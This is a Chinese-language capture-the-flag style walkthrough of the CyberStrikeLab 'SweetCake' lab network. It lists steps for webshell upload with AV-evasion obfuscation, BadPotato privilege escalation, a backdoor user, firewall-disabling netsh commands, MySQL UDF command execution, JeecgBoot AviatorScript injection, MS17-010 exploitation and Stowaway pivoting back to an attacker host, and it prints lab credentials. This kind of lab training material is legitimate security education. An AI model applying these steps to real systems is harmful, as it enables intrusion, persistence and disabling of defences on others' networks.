CyberStrikeLab SweetCake 渗透测试实战教学文档

1. 第一台机器渗透测试

1.1 信息收集

• 使用fscan扫描发现仅开放8888端口，运行Tomcat服务
• 目录扫描：使用43万条目的红队专用字典扫描，发现关键目录

1.2 漏洞利用

• 上传Webshell到根目录
• 使用哥斯拉特战版进行混淆绕过检测
• 发现Windows Defender存在但未启用

1.3 权限提升

方法一：BadPotato提权

1. 使用BadPotato.exe直接提权
2. 创建后门用户并开启3389远程桌面
3. 通过bat脚本执行命令避免引号问题
4. 关闭防火墙命令：

   netsh advfirewall set allprofiles state off
   

   特定网络配置关闭：

   netsh advfirewall set domainprofile state off
   netsh advfirewall set privateprofile state off
   netsh advfirewall set publicprofile state off
   

方法二：正向连接

1. 使用Vshell进行正向连接
2. 生成CS客户端：
   • 4444端口用于CS上线
   • 5555端口用于提权
3. 使用BadPotato执行5555客户端

1.4 内网横向移动

• 使用Stowaway搭建第一层代理
• 上传fscan进行内网扫描
• 获取凭证：Struts@cslab

2. 第二台机器（通达OA）

2.1 漏洞利用

• 通达OA数据库提权漏洞利用
• 获取数据库凭据：root/HvaaOUr6n^v`_dyw@0YjA

2.2 提权过程

1. 在MySQL目录下创建lib和plugin目录
2. 上传lib_mysqludf_sys.dll（可使用sqlmap自带但需解密）
3. 使用BadPotato提权（靶机响应慢，建议写入bat脚本执行）
4. 通过RDP连接读取flag

3. 第三台机器（积木报表）

3.1 漏洞发现

• 识别为JeecgBoot系统
• AviatorScript表达式注入漏洞

3.2 漏洞利用

1. 新建报表时使用BP抓包
2. 修改save接口POC进行注入
3. 使用show接口触发代码执行
4. 连接冰蝎4：
   • URL: http://localhost:8085/jmreport/showme
   • 密码: password
   • 请求头: Referer: Fvjxgwzbm

3.3 权限维持

• 使用5555正向客户端上线CS
• 获取hash: aviator!321
• 开启3389并关闭防火墙

4. 第四台机器

4.1 信息收集

• 发现桌面有Xshell
• 抓取明文凭据

4.2 横向移动

• 使用XTerminal连接（Xshell文件传输问题）
• 使用Stowaway搭建第二层代理

5. 第五台机器

5.1 内网渗透

• 发现MS17-010漏洞
• 使用MSF进行利用
• 备用方案：通过1433端口攻击

附录：常用命令参考

防火墙管理

:: 关闭所有防火墙
netsh advfirewall set allprofiles state off

:: 重新启用防火墙
netsh advfirewall set allprofiles state on

BadPotato使用

BadPotato.exe -c "command_to_execute"

数据库UDF提权

1. 创建函数：

CREATE FUNCTION sys_exec RETURNS string SONAME 'lib_mysqludf_sys.dll';

2. 执行命令：

SELECT sys_exec('command');

内网代理搭建

# Stowaway使用示例
./admin -l 9999
./agent -c [攻击机IP] -p 9999

本教学文档涵盖了从信息收集到内网横向移动的全过程，重点突出了各种提权技术和漏洞利用方法，以及在内网环境中的代理搭建技术。实际渗透测试中请确保获得合法授权，并注意操作带来的安全风险。